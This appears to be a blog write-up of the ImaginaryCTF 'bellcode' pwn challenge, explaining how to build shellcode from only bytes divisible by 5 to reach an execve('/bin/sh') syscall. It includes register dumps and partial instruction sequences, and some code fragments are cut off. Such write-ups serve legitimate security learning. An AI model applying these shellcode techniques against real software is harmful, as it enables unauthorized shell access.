Bellcode - ImaginaryCTF
➜ bellcode pwn checksec bellcode
[*] '/home/kali/CTFs/CTFtime/imaginaryctf/pwn/bellcode/bellcode'
Arch: amd64-64-little
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
- It’s a 64 bit ELF file and PIE enabled.
- Let’s see if we can find any leaks in the file by running it
- Seems like we can’t leak anything, Let’s open it up in IDA
Debugging part
Decompiled view of main function
- I’ve commented out everything in detail (see the above image)
what it does?
- First it creates a read, write, executable area in memory for 0×2000 bytes
- Then it gets our input for 4096 bytes and stores it in that mmaped area
- Finally it checks every byte of our input and divides it with 5,
- if it’s dividable by 5, then it executes our input
- else it simply exits
what we can do with it??
Finding valid instructions by brute forcing [0×00 to 0xff]
from pwn import disasm
valid_instructions = []
for byte in range(0x00,0xff):
if (byte % 5) == 0:
for valid_byte in valid_instructions:
byte = valid_byte.to_bytes(1,'little')
0: 1e push ds
0: 37 aaa
0: 41 inc ecx
0: 46 inc esi
0: 4b dec ebx
0: 50 push eax
0: 55 push ebp
0: 5a pop edx
0: 5f pop edi
0: 64 fs
0: 6e outs dx, BYTE PTR ds:[esi]
0: 91 xchg ecx, eax
0: 96 xchg esi, eax
0: 9b fwait
0: a5 movs DWORD PTR es:[edi], DWORD PTR ds:[esi]
0: aa stos BYTE PTR es:[edi], al
0: af scas eax, DWORD PTR es:[edi]
0: c3 ret
0: d7 xlat BYTE PTR ds:[ebx]
0: f0 lock
0: f5 cmc
0: fa cl
- These are some valid single byte instructions that are divisible by 5 (truncated the unwanted instructions)
- But there’s no syscall in this output
- Let’s see that maually
- These bytes also divisible by 5, so there’s no issues while calling the syscall
Exploit structure
- Main goal of our shellcode is to call execve syscall with these arguments, so we can get a shell
rax: 0x3b ; syscall number
rdi: '/bin/sh' ; first argument need to be a pointer to '/bin/sh'
rsi: 0 ; argv
rdx: 0 ; envp
If we placed the above things correctly then we can call syscall to get shell 😃
Now let’s try to craft this exploit
Exploitation part
Get intial register values
Let’s try to get some info about the available registers, so we can use already available values
RAX 0x0
RBX 0x5555555552f0 (__libc_csu_init) ◂— endbr64
RCX 0x7ffff7ec3603 (write+19) ◂— cmp rax, -0x1000 /* 'H=' */
RDX 0xfac300 ◂— 0xa32 /* '2\n' */
RDI 0x7ffff7fa6670 (_IO_stdfile_1_lock) ◂— 0x0
RSI 0x7ffff7fa4743 (_IO_2_1_stdout_+131) ◂— 0xfa6670000000000a /* '\n' */
R8 0x20
R9 0x0
R10 0x21
R11 0x246
R12 0x5555555550e0 (_start) ◂— endbr64
R13 0x0
R14 0x0
R15 0x0
RBP 0x7fffffffe560 ◂— 0x0
*RSP 0x7fffffffe548 —▸ 0x5555555552e0 (main+279) ◂— mov eax, 0
*RIP 0xfac300 ◂— 0xa32 /* '2\n' */
RAX, R9, R13, R14, R15
are null
So let’s make use of it
Craft RDX = 0×0
push rax
pop rdx
xchg esi, eax
- rax is 0 so let’s exchange it with esi
*RAX 0x3edfa743
RBX 0x56153b17f2f0 (__libc_csu_init) ◂— endbr64
RCX 0x7fe53ed19603 (write+19) ◂— cmp rax, -0x1000 /* 'H=' */
RDX 0x0
RDI 0x7fe53edfc670 (_IO_stdfile_1_lock) ◂— 0x0
*RSI 0x0
- Now our registers will lools like this
- rsi, rdx done. Now for the big part
Craft RDI = ‘/bin/sh’ pointer
- First we don’t have
in the binary
- Also we don’t know it’s position in libc, coz we don’t have any libc leaks
- So we need to move that manual to the memory and make a pointer to point that string
- Here the problem is we are limited to instructions
- We can’t use instructions like
mov <rax or any register name starts with r>, <some value>
- We can only use some
inc, dec, sub
- Also we can’t move the whole 8 bytes to a register since we can’t use any full register
- So we need to move this 7 byte string byte by byte into some place
- And finally push that to stack and make a pointer to it by
pop rdi
- Before that we need to make rax again to 0×0
xchg eax,r14d
- Since r14 has 0×0 we can exchange that with eax
Useful instruction
sub eax, <some value>
- By using that we can subtract some value in eax register
- But we’re limited to multiples of 5
- So let’s use another instruction called
dec eax
- By using this two registers we can perfectly set a value in rax
- Ok what’s next? how we’re going to move that to a pointer
push rbp
- This pushes rbp address to stack
pop rdi
- This tooks that value and store it rdi
- Now get ready for a magic instruction
stos BYTE PTR es:[rdi], al
- This moves our last byte of rax to the pointer of rdi
- So we can write a byte in rbp
- Let’s try that
- First set the value of rax to 0×2f (that’s basically the hex of the string ‘/’ )
dec eax
sub eax,0xfffffaff
sub eax,0xff
sub eax,0xff
sub eax,0xff
sub eax,0xff
sub eax,0xd2
dec eax
dec eax
dec eax
- This decrements eax and finally sets that to 0×2f
- Now let’s do the remaining things
push rbp
pop rdi
stos BYTE PTR es:[rdi], al
- This moves our 0×2f to the last byte of rdi pointed location
- It points our rbp so we can get ‘/’ in rbp
- Here we successfully moved
to the rbp
- Now let’s try to move the other strings also
speed runnnnnnnnn 🏃
- I will attach a full writeup in the ending of the writeup
- Now let’s push rbp and pop rdi, ez pz
- Everything is set perfectly, just need to change the value in rax to
Craft RAX = 0×3b
- Now let’s set decrement rax and make a syscall
- Cool we got it
- Now let’s try this in remote
- Perfect <3
- Thank you for reading my blog post, I hope you enjoyed it.
- See you soon in my next one, Cheers
Here is the full exploit script: exploit link